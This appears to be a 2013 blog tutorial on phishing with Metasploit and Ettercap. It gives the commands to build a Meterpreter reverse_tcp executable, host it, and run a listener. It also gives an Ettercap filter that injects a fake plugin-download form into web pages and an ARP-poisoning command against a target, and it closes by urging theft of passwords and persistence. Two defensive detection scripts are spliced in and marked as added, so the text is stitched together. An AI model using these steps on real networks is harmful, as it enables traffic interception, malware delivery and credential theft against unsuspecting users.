Phishing with Meterpreter and Ettercap

By ISBuzz Team
Writer, Information Security Buzz | Dec 02, 2013 03:16 am PST

To phish or not to phish? That is the question. If you’re looking to attack someone who’s not very computer savvy, then phishing is the easiest way to go about it. Instead of using a zero-day that could take you hours to write or trying to find a computer with an exploitable service, why not make them connect to you? Using a Meterpreter payload and Ettercap, you can easily fool someone into exploiting their own system for your benefit. What are you waiting on? Let’s go phishing!

In this video, I teach you how to phish. Using a Kali Linux Virtual Machine, a Windows XP SP3 Virtual Machine, the Metasploit framework, an Apache2 webserver, and Ettercap, I conduct a simple but effective phishing attack. Using a Meterpreter reverse_tcp payload from the Metasploit Framework, I create an executable file for Windows (.exe) and save it so I can use it in my webserver. I used a reverse_tcp shell because I want the target computer to connect back to my computer.


The steps for the first part of this video (The setup of the executable and server) are as follows:

Open a terminal in Kali and type this command:

~# /etc/init.d/apache2 start

This starts up your webserver to serve up whatever is put into the /var/www/ directory.

I then used the msfconsole command to find my payload:

~# msfconsole

msf> show payloads

From there, I set my sights on windows/meterpreter/reverse_tcp and built my executable exploit.

~# msfpayload windows/meterpreter/reverse_tcp LHOST=”Kali IP” LPORT=”Port of your choosing” x > payload.exe

Once that is done, the file is then moved to /var/www/. This means it is now being served up on the webserver. I then set up a multi handler which is a generic payload handler. So I went back to my msfconsole terminal and used these commands.

msf> use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST “kali ip”

set LPORT “port of your choosing” (Must be the same port from when you made your executable)

and then


When this is working, it is now listening for the exploit to call back to your computer. Make sure you don’t touch it until then! We’ll then need to create and compile an Ettercap filter. In this video, I used an image of Shaquille O’Neal dancing with Conan O’Brien for the sake of the demo, but you can use a QuickTime logo, an ActiveX logo or whatever you have to make this attack more believable. In a text file, type this code:

if (ip.proto == TCP && tcp.dst == 80) {

if (search(, “Accept-Encoding”)) {

replace(“Accept-Encoding”, “Accept-Nothing!”);




if (ip.proto == TCP && tcp.src == 80) {

if (search(, “<title>”)) {

replace(“</title>”, “</title><form

action=”http://kaliIP/payload.exe” method=”link”><img src=”http://kaliIP/image.gif“><INPUT TYPE=submit value=”DOWNLOAD LATEST PLUGINS!“></form><html><body><h10>You are unable to view some of the web page’s contents. You need to download the latest plugins to fix this issue.</h10></body></html>”);

msg(“html injected”);


The filter has two rules. For TCP traffic going to port 80 (HTTP), it replaces the Accept-Encoding header with Accept-Nothing!. For TCP traffic coming from port 80, it replaces the closing tag of the <title> element (</title>) with </title><form … so that the markup placed there is injected into the web page.
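Both rewrites leave traces that a proxy or network sensor can look for. The following is an added detection example, not part of the original article: the function names, the sample messages and the documentation address 192.0.2.10 are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlparse

KNOWN_ACCEPT = {"accept-charset", "accept-encoding", "accept-language"}
# A <form> opened directly after </title>, i.e. inside <head>, where no form belongs.
FORM_AFTER_TITLE = re.compile(
    r"</title>\s*<form[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", re.I)
EXECUTABLE = re.compile(r"\.(exe|scr|msi|bat)$", re.I)

def request_findings(raw_request):
    """Findings for one raw HTTP request as seen at a proxy or sensor."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    names = [l.split(":", 1)[0].strip().lower()
             for l in head.split("\r\n")[1:] if ":" in l]
    findings = [f"unknown Accept-* header: {n}" for n in names
                if n.startswith("accept-") and n not in KNOWN_ACCEPT]
    if "user-agent" in names and "accept-encoding" not in names:
        findings.append("browser request without Accept-Encoding")
    return findings

def response_findings(html):
    """Findings for one HTML response body."""
    findings = []
    for match in FORM_AFTER_TITLE.finditer(html):
        url = urlparse(match.group(1))
        try:
            ipaddress.ip_address(url.hostname or "")
            literal_ip = True
        except ValueError:
            literal_ip = False
        # Flag forms that fetch an executable or point at a bare IP address.
        if EXECUTABLE.search(url.path) or literal_ip:
            findings.append(f"form after </title> targets {match.group(1)}")
    return findings

# Constructed samples; 192.0.2.10 is a documentation address, not from the page.
TAMPERED_REQUEST = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
                    "User-Agent: Mozilla/4.0\r\nAccept: */*\r\n"
                    "Accept-Nothing!: gzip, deflate\r\n\r\n")
CLEAN_REQUEST = TAMPERED_REQUEST.replace("Accept-Nothing!", "Accept-Encoding")
CLEAN_HTML = "<html><head><title>News</title></head><body>Hi</body></html>"
TAMPERED_HTML = CLEAN_HTML.replace(
    "</title>", '</title><form action="http://192.0.2.10/payload.exe" '
    'method="link"><input type=submit value="x"></form>')

if __name__ == "__main__":
    print(request_findings(TAMPERED_REQUEST), response_findings(TAMPERED_HTML))
```

Serving sites over HTTPS removes the plaintext that both rules depend on, since the filter only matches traffic on port 80.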

Make sure the things in bold are changed to the IPs of your attacking box, images in your webserver directory and whatever you want your button to say. Once done, save it as iframe.filter in your root directory. We’ll then use the program Etterfilter to compile the filter we just made.

Open a terminal and type this command:

~# etterfilter iframe.filter -o iframe.ef

This will compile the filter and make it usable with Ettercap. After the filter is compiled, you will then use Ettercap to commence ARP poisoning with said filter.

~# ettercap -T -q -F iframe.ef -M ARP /targetip/ //

This will ARP poison the target computer so whenever it sends a request to a website, it gets what we tossed in the filter through HTML injection. So now, whenever the target computer goes to an HTTP webpage, your image will pop up at the top of the webpage saying that their plugins are out of date and they need to install your executable. If they are gullible enough, they will download your executable payload and run it; it will then connect back to your machine and you will have a shell in your Metasploit Framework terminal. To make it even more believable, right when the target connects to your listener, you can shut down the Ettercap ARP poison to make it seem like the updates were installed.
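ARP poisoning shows up in the poisoned host's own neighbour table: the gateway's IP address suddenly maps to a different MAC address, and that MAC is shared with another host on the segment. The following is an added detection example, not part of the original article. It assumes Linux `ip neigh` output, and the addresses and function names are constructed.

```python
import re
from collections import defaultdict

# Matches lines such as: 192.168.56.1 dev eth0 lladdr 52:54:00:aa:bb:01 REACHABLE
NEIGH = re.compile(r"^(\S+) dev \S+ lladdr ([0-9a-f:]{17})\b", re.I)

def parse_neigh(text):
    """Map IP address -> MAC address from `ip neigh` output."""
    table = {}
    for line in text.strip().splitlines():
        match = NEIGH.match(line.strip())
        if match:  # entries without a link-layer address are skipped
            table[match.group(1)] = match.group(2).lower()
    return table

def arp_findings(baseline, current, gateway):
    """Compare a trusted snapshot with the current table."""
    findings = []
    old, new = baseline.get(gateway), current.get(gateway)
    if old and new and old != new:
        findings.append(f"gateway {gateway} moved {old} -> {new}")
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:  # one adapter answering for several addresses
            findings.append(f"{mac} claimed by {', '.join(sorted(ips))}")
    return findings

# Constructed snapshots of the same host before and during poisoning.
BASELINE = """
192.168.56.1 dev eth0 lladdr 52:54:00:aa:bb:01 REACHABLE
192.168.56.20 dev eth0 lladdr 08:00:27:cc:dd:20 STALE
192.168.56.30 dev eth0 FAILED
"""
POISONED = """
192.168.56.1 dev eth0 lladdr 08:00:27:cc:dd:20 REACHABLE
192.168.56.20 dev eth0 lladdr 08:00:27:cc:dd:20 STALE
"""
GATEWAY = "192.168.56.1"

if __name__ == "__main__":
    for finding in arp_findings(parse_neigh(BASELINE), parse_neigh(POISONED), GATEWAY):
        print(finding)
```

On managed switches, Dynamic ARP Inspection together with DHCP snooping blocks forged ARP replies before they reach the host.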

If this works, you have successfully tricked the user into downloading and executing a malicious payload giving you a Meterpreter session. From here, you’ll probably want to work on some Post-Exploitation techniques such as pilfering information, usernames/passwords, and persistence. Happy phishing!

About the Author
Christian R. Crank is a cyber security researcher and instructor for Advanced Security by TrainACE. Christian has over five years as a penetration tester and holds a number of industry related certifications.